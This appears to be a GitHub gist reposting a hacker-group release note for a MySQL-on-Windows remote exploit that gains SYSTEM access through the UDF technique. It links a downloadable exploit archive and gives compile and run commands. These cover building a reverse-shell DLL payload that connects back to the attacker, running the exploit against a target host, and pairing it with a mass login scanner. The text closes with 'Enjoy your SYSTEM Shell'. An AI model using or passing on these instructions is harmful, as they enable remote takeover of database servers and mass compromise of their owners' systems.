Created
November 7, 2016 08:10
-
-
Save nu11secur1ty/b73074979cfed5d4ec3049dda1e726ed to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
*** | |
FARLiGHT ELiTE HACKERS LEGACY R3L3ASE | |
*** | |
Attached is the MySQL Windows Remote Exploit (post-auth, udf | |
technique) including the previously released mass scanner. | |
The exploit is mirrored at the farlight website http://www.farlight.org. | |
Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday | |
All owned By Kingcope | |
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23073.tar.gz | |
Installation Instructions | |
============================= | |
1. Install mysql client libraries and headers (UNIX) | |
RedHat based (e.g. CentOS): | |
yum install mysql mysql-devel | |
2. Compile the standalone exploit | |
issue commands: | |
gcc mysqljackpot.c -o mysqljackpot -L/usr/lib/mysql -lmysqlclient | |
3. Compile the reverse shell payload (this is required!) | |
required because the connect back ip and port are hardcoded in the dll: | |
use mingw on windows or wine | |
change REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you have | |
to change the port in mysqljackpot.c too (default port: 443). | |
issue commands: | |
set PATH=%PATH%;c:\MinGW\bin\ | |
gcc -c payload.c | |
gcc -shared -o payload.dll payload.o -lws2_32 | |
copy the payload.dll into the mysqljackpot exploit folder | |
4. Run The Exploit | |
./mysqljackpot -u root -p "" -t 99.99.99.99 | |
A valid database admin user and his password are required | |
for the exploit to work properly. | |
This exploit is especially useful when used in connection | |
to a MySQL login scanner, see scanner/README.mysql inside this package. | |
Be sure to have the firewall open on the desired reverse port | |
on the attacking machine. | |
5. Enjoy your SYSTEM Shell!!! | |
Yours Sincerely, | |
-- Kingcope | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment